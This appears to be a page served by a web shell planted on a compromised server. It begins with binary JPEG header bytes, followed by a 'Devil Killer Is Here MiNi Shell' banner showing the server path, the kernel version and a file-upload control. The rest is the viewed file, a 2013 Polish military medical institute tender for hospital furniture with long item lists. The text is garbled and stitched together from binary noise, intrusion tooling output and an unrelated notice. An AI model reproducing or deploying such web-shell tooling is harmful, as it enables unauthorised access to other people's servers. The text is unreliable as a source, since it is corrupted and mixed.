JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131105/450408-N-2013.html

<p class="kh_header"><b>Warszawa: Dostawa mebli medycznych, biurowych, regałów metalowych, stelaży na worki, wózka transportowego do przewozu chorego oraz wózków opatrunkowo-zabiegowych</b><br>
<b>Numer ogłoszenia: 450408 - 2013; data zamieszczenia: 05.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojskowy Instytut Medyczny , ul.Szaserów 128, 00-909 Warszawa, woj. mazowieckie, tel. 022 681-67-49, faks 022 681-67-49.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wim.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli medycznych, biurowych, regałów metalowych, stelaży na worki, wózka transportowego do przewozu chorego oraz wózków opatrunkowo-zabiegowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet - 1
             Meble medyczne
Pakiet - 2 
             Meble biurowe i inne wyposażenie
Pakiet - 3
1.	Regały metalowe 
Pakiet - 4 
1.	Stelaże na worki 
Pakiet - 5
1.	Wózek do przewozu chorego 
Pakiet - 6
1.	Wózek opatrunkowo-zabiegowy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.19.23.00-5, 39.13.00.00-2, 39.14.11.00-3, 33.19.23.30-4, 33.10.00.00-1, 34.91.11.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (zał. nr 1 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (zał. nr 1 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (zał. nr 1 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (zał. nr 1 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (zał. nr 1 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">A) Deklarację lub certyfikat zgodności na przedmiot oferty, wystawiony przez uprawniony podmiot, zgodne z wymaganiami określonymi w ustawie z dnia 20 maja 2010 r. o wyrobach medycznych (Dz.U. z 2010 r. Nr 107, poz. 679 z późn. zm.) dotyczy pakietu 1 poz. 7,14,15,19,28,54,63  oraz pakietu 5 i 6								
 B) Atest higieniczny dotyczący wyrobów gotowych dotyczy mebli na profilu aluminiowym, dotyczy poz. 1,2,3,4,5,6,8,10,11,12,13,20,21,22,23,24,25,26,27,29,30,32,33,34,35,38,39,44,45,46,47,48,49,50,51,52,57,58,59,60 pakietu 1 C) Materiały informacyjne na temat przedmiotu oferty (prospekty, broszury, dane techniczne itp. - w języku polskim lub angielskim) dotyczy wszystkich pakietów</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie VI.4 siwz, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Postanowienie punktu VI.5 siwz stosuje się odpowiednio.	       W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z dokumentów, o których mowa w punkcie VI.3 - VI.7 siwz musi być złożony przez każdego z Wykonawców oddzielnie, natomiast dokumenty, o których mowa w punkcie VI.1 siwz mogą zostać złożone wspólnie.  W przypadku powierzenia realizacji zamówienia podwykonawcom, wykonawca zobowiązany jest do wskazania w ofercie tej części zamówienia, której realizację powierzy podwykonawcy (na formularzu stanowiącym załącznik nr 3 do SIWZ). W przypadku braku takiego oświadczenia, zamawiający uzna, iż wykonawca będzie realizował zamówienie bez udziału podwykonawców.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach w przypadku obniżenia ceny przedmiotu umowy - obniżenie jego ceny w umowie								
Zamawiający dopuszcza zmianę treści umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w przypadku wystąpienia siły wyższej uniemożliwiającej ukończenie prac w terminie, celem modyfikacji terminu o którym mowa w § 3 ust. 1 umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wim.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojskowy Instytut Medyczny
ul. Szaserów 128
04-141 Warszawa 44
pokój nr 423
IV piętro  budynek nr 32 Oddziału Techniczno-Eksploatacyjnego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.11.2013 godzina 09:00, miejsce: Wojskowy Instytut Medyczny
Kancelaria Ogólna
ul. Szaserów 128
04-141 Warszawa 44
I piętro - budynek nr 31 Dyrekcji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Klinika Hematologii i Ośrodek Przeszczepu Szpiku						
2	Pokój aferez, meble płycinowe na profilu aluminiowym						
3	poz. 1 zabudowa przyścienna					1	kpl
4	poz. 2 blat płycinowy					1	szt
5	poz. 3 szafka wisząca					3	szt
6	poz. 4 biurko					1	szt
7	poz. 5 pomocnik pod drukarkę					1	szt
8	poz. 6 szafka wisząca					1	szt
9	Pomieszczenie 26- magazyn płynów infuzyjnych						
10	poz. 7 wózek ze stali kwasoodpornej					1	szt
11	Pomieszczenie nr 25 śluza umywalkowo - fartuchowa						
12	poz. 8 szafa na ubrania na profilu alminiowym					1	szt
13	poz. 9 wieszak ze stali kwasoodpornej					1	szt
14	Sale chorych pomieszczenia nr: 22,18,15,11,8,2. meble płycinowe na profilu aluminiowym						
15	poz. 10 szafka przyścienna 					6	szt
16	poz. 11 szafa depozytowa 					6	szt
17	poz. 12 szafa depozytowa					7	szt
18	Pomieszczenie nr 35 pomieszczenie sprzętu porządkowego						
19	poz. 13 szafka na stelażu aluminiowym					1	szt
20	Pomieszczenie nr 1 komunikacja						
21	poz. 14 wózek ze stali kwasoodpornej					2	szt
22	poz. 15 wózek ze stali kwasoodpornej					1	szt
23	poz. 16 panel ze stali kwasoodpornej					30	szt
24	poz. 17  kosz ze stali kwasoodpornej					19	szt
25	poz. 18  kosz  ze stali kwasoodpornej					6	szt
26	poz. 19 taboret pneumatyczny					10	szt
27	Pomieszczenie nr 14 dyżurka pielęgniarek meble płycinowe na profilu aluminiowym						
28	poz. 20 Lada pielęgniarska					1	szt
29	poz. 21 szafa na dokumenty					1	szt
30	Pomieszczenie nr 5 pokój przygotowania odczynników - meble płycinowe na profilu aluminiowym						
31	poz. 22 szafa na leki dwudrzwiowa					1	szt
32	poz. 23 zabudowa stojąca					1	szt
33	poz. 24 szafka wisząca					4	szt
34	poz. 25 zabudowa stojąca					1	szt
35	poz. 26 szafka wisząca					3	szt
36	poz. 27 biurko					1	szt
37	poz. 28 krzesło medyczne					2	szt
38	poz. 29 szafka wisząca					1	szt
39	poz. 30 szafka pod drukarkę 					1	szt
40	Pomieszczenie nr 34 dyżurka pielęgniarek						
41	poz. 31 szafa na leki					1	szt
42	poz. 32 szafa na dokumenty na profilu aluminiowym					2	szt
43	poz. 33 szafa na profilu aluminiowym					1	szt
44	poz. 34 szafka pod umywalkę + bateria łokciowa na profilu aluminiowym					1	kpl
45	poz. 35 konsola na profilu aluminiowym					1	szt
46	poz. 36 wózek do przewożenia leków ze stali kwasoodpornej					1	szt
47	Pomieszczenie nr 6 magazyn bielizny czystej						
48	poz. 37 zestaw szaf z drzwiami suwanymi					1	szt
49	poz. 38 szafa na profilu aluminiowym					1	szt
50	poz. 39 biurko na profilu aluminiowym					1	szt
51	poz. 40 stolik					1	szt
52	poz. 41 szafa ubraniowa					1	szt
53	poz. 42 szafka wisząca					1	szt
54	poz. 43 komoda					1	szt
55	Pomieszczenie nr 17 pokój zabiegowy meble płycinowe na profilu aluminiowym						
56	poz. 44 biurko					1	szt
57	poz. 45 stanowisko do pobierania krwi					1	szt
58	poz. 46 szafka pod umywalkę, umywalka, zlew, 2 baterie					1	kpl
59	poz. 47 szafa dzielona w poziomie					2	szt
60	poz. 48 zabudowa stojąca, 5 szafek pod blatem					1	kpl
61	poz. 49 szafka wisząca					3	szt
62	Pomieszczenie nr 24 pokój badań meble płycinowe na profilu aluminiowym						
63	poz. 50 biurko					1	szt
64	poz. 51 szafka wiszaca					1	szt
65	poz. 52 szafa na dokumenty					4	szt
66	poz. 53 taboret pneumatyczny					1	szt
67	poz. 54 kozetka lekarska					1	szt
68	poz. 55 parawan przejezdny					3	szt
69	Pmieszczenie nr 37 śluza						
70	poz. 56 wieszak mocowany do ściany ze stali kwasoopornej					1	szt
71	poz. 57 regał na profilu aluminiowym					1	szt
72	Pomieszczenie nr 32 pokój łóżkowy 4-osobowy meble płycinowe na profilu aluminiwym						
73	poz. 58 biurko					1	szt
74	poz. 59 zabudowa stojąca					1	kpl
75	poz 60 szafka wisząca					2	szt
76	Pomieszczenie nr 8 brudownik						
77	poz. 61 półka na baseny i kaczki ze stali kwasoodpornej					1	szt
78	sale chorych: mpomieszczenie nr 22,18,15,11,8,2						
79	poz. 62 podest do łóżka					5	szt
80	poz. 63 stojak do płynów infuzyjnych					20	szt
81	Pomieszczenie nr 39 łazienka przy izolatce						
82	poz. 64 półka na baseny i kaczki					1	szt
83	Pomieszczenia nr 10,12,14,16,19,21,27,31,33,39,41,43,45 łazienka chorych						
84	poz. 65 krzesło uchylne pod prysznic					20	szt
85	poz. 66 uchwyt dla niepełnosprawnych					20	szt
86	poz. 67 półka narożna do montażu w kabinie prysznicowej					9	szt
87	poz. 68 uchwyt dla niepełnosprawnych ze stali					20	szt
88	poz. 69 drążek z haczykami					22	szt
89	Pomieszczenie nr 22 pokój lekarzy						
90	poz. 70 parawan					1	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.23.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Klinika Hematologii i  Ośrodek Przeszczepu Szpiku						
2	Pokój pielęgniarki oddziałowej - meble płycinowe						
3	poz. 1 stół					1	szt
4	poz. 2 krzesło					2	szt
5	poz. 3 komoda					1	szt
6	poz. 4 biurko					1	szt
7	poz. 5 fotel do biurka					1	szt
8	poz. 6 szafa ubraniowa					1	szt
9	poz. 7 szafa na segregatory					1	szt
10	poz. 8 półka ścienna					1	szt
11	poz. 9 półka na segregatory					1	szt
12	Pokój socjalny - meble płycinowe						
13	poz. 10 kanapa					1	szt
14	poz. 11 fotel stojący wypoczynkowy					1	szt
15	poz. 12 stół					1	szt
16	poz. 13 krzesło					4	szt
17	poz. 14 ława					1	szt
18	poz. 15 zabudowa przyścienna					1	szt
19	poz. 16 szafka wisząca					2	szt
20	poz. 17 szafka wisząca					1	szt
21	Pomieszczenie 29, meble płycinowe						
22	poz. 18 szafa depozytowa					1	szt
23	poz. 19 szafa depozytowa					2	szt
24	Korytarz						
25	poz. 20 szafa wnękowa płycinowa					2	szt
26	Pomieszczenie nr 28 pokój lekarzy - meble płycinowe						
27	poz. 21 biurko					3	szt
28	poz. 22 fotel do biurka					3	szt
29	poz. 23 szafa kartotekowa					5	szt
30	poz. 24 szafa ubraniowa					3	szt
31	poz. 25 szafka pod zlewozmywak, zlewozmywak + bateria łokciowa					1	kpl
32	poz. 26 szafka wisząca					1	szt
33	poz. 27 szafka wisząca					1	szt
34	poz. 28 szafka ścienna na segregatory					3	szt
35	Pomieszczenie nr 29 pokój lekarzy - meble płycinowe						
36	poz. 29 biurko 					4	szt
37	poz. 30 fotel do biurka					4	szt
38	poz. 31 szafa kartotekowa					2	szt
39	poz. 32 szafa kartotekowa					1	szt
40	poz. 33 szafa kartotekowa					2	szt
41	poz. 34 szafa ubraniowa					2	szt
42	poz. 35 szafka pod zlewozmywak, zlewozmywak + bateria					1	kpl.
43	poz. 36 szafka wisząca					1	szt
44	poz. 37 szafka wisząca					1	szt
45	poz. 38 szafka wisząca					4	szt
46	Pomieszczenie nr 35 pokój socjalny meble płycinowe						
47	poz. 39 szafa depozytowa					2	szt
48	poz. 40 kanapa					1	szt
49	poz. 41 stół					1	szt
50	poz. 42 krzesło do stołu					5	szt
51	poz. 43 aneks kuchenny					1	szt
52	poz. 44 szafrka wisząca					1	szt
53	poz. 45 szafka wisząca					1	szt
54	Pomieszczenie nr 3 pokój  psychologa - meble płycinowe						
55	poz. 46 biurko L				1	szt
56	poz. 47 fotel do biurka					2	szt
57	poz. 48 fotel do ławy					2	szt
58	poz. 49 ława					1	szt
59	poz. 50 szafa ubraniowa					1	szt
60	poz. 51 szafa kartotekowa					1	szt
61	Pomieszczenie nr 2 sekretariat meble płycinowe						
62	poz. 52 biurko					2	szt
63	poz. 53 fotel do biurka					2	szt
64	poz. 54 krzesło pacjenta					1	szt
65	poz. 55 fotel do ławy 					2	szt
66	poz. 56 stolik					1	szt
67	poz. 57 szafa na dokumenty					3	szt
68	poz. 58 szafka pod drukarkę					2	szt
69	poz. 59 aneks kuchenny					1	szt
70	poz. 60 szafka wisząca					1	szt
71	poz. 61 szafka wisząca					1	szt
72	Pomieszczenie nr 7 pokój salowych meble płycinowe						
73	poz. 62 sofa					1	szt
74	poz. 63 stół					1	szt
75	poz. 64 krzesło					4	szt
76	poz. 65 komoda depozytowa					1	szt
77	poz. 66 szafka pod zlewozmywak, zlewozmywak + bateria sztorcowa					1	kpl
78	poz. 67 szafka wisząca					1	szt
79	Pomieszczenie nr 22 pokój lekarzy meble płycinowe						
80	poz. 68 fotel do biurka					5	szt
81	poz. 69 biurko z maskownicą					5	szt
82	poz. 70 szafka wisząca					2	szt
83	poz. 71 szafka wisząca					2	szt
84	poz. 72 szafa na dokumenty					3	szt
85	poz. 73 zestaw szaf dla trzech osób					1	szt
86	poz. 74 szafa					1	szt
87	poz. 75 szafka pod drukarkę					1	szt
88	poz. 76 szafka					1	szt
89	poz. 77 ława					1	szt
90	poz. 78 krzesło pacjenta					10	szt
91	poz. 79 szafka pod zlewozmywak, zlew i bateria					1	kpl
92	poz. 80 szafka wisząca					1	szt
93	poz. 81 szafa					1	szt
95	poz. 82 szafka wisząca 					2	szt
96	Pomieszczenie nr 1 pokój kierownika kliniki - meble płycinowe						
97	poz. 83 biurko L				1	szt
98	poz. 84 szafka narożna					1	szt
99	poz. 85 półka					1	szt
100	Korytarz						
101	poz. 86 szafa wnękowa					1	szt
102	poz. 87 szafa wnękowa					1	szt
103	poz. 88 szafa wnękowa					1	szt
104	Pokój aferez, meble płycinowe na profilu aluminiowym						
105	poz. 89 fotel do biurka					1	szt
106	Pomieszczenie nr 14 dyżurka pielęgniarek meble płycinowe na profilu aluminiowym						
107	poz. 90 fotel do biurka					2	szt
108	poz. 91 krzesło pacjenta					2	szt
109	Pomieszczenie nr 5 pokój przygotowania odczynników - meble płycinowe na profilu aluminiowym						
110	poz. 92 fotel do biurka					1	szt
111	Pomieszczenie nr 34 dyżurka pielęgniarek						
112	poz. 93 fotel do biurka					2	szt
113	Pomieszczenie nr 6 magazyn bielizny czystej						
114	poz. 94 fotel do biurka					1	szt
115	poz. 95 fotel wypoczynkowy					2	szt
116	Pomieszczenie nr 17 pokój zabiegowy meble płycinowe na profilu aluminiowym						
117	poz. 96 fotel do biurka					1	szt
118	poz. 97 krzesło pacjenta					2	szt
119	Pomieszczenie nr 24 pokój badań meble płycinowe na profilu aluminiowym						
120	poz. 98 fotel do biurka					1	szt
121	poz. 99 krzesło pacjenta					2	szt
122	Pomieszczenie nr 32 pokój łóżkowy 4-osobowy meble płycinowe na profilu aluminiwym						
123	poz. 100 fotel do biurka					1	szt
124	sale chorych: mpomieszczenie nr 22,18,15,11,8,2						
125	poz. 101 krzesło plastikowe					36	szt
126	poz. 102 krzesła na belce (a 5szt)					2	zest
127	Pomieszczenie nr 25 śluza umywalkowo - fartuchowa						
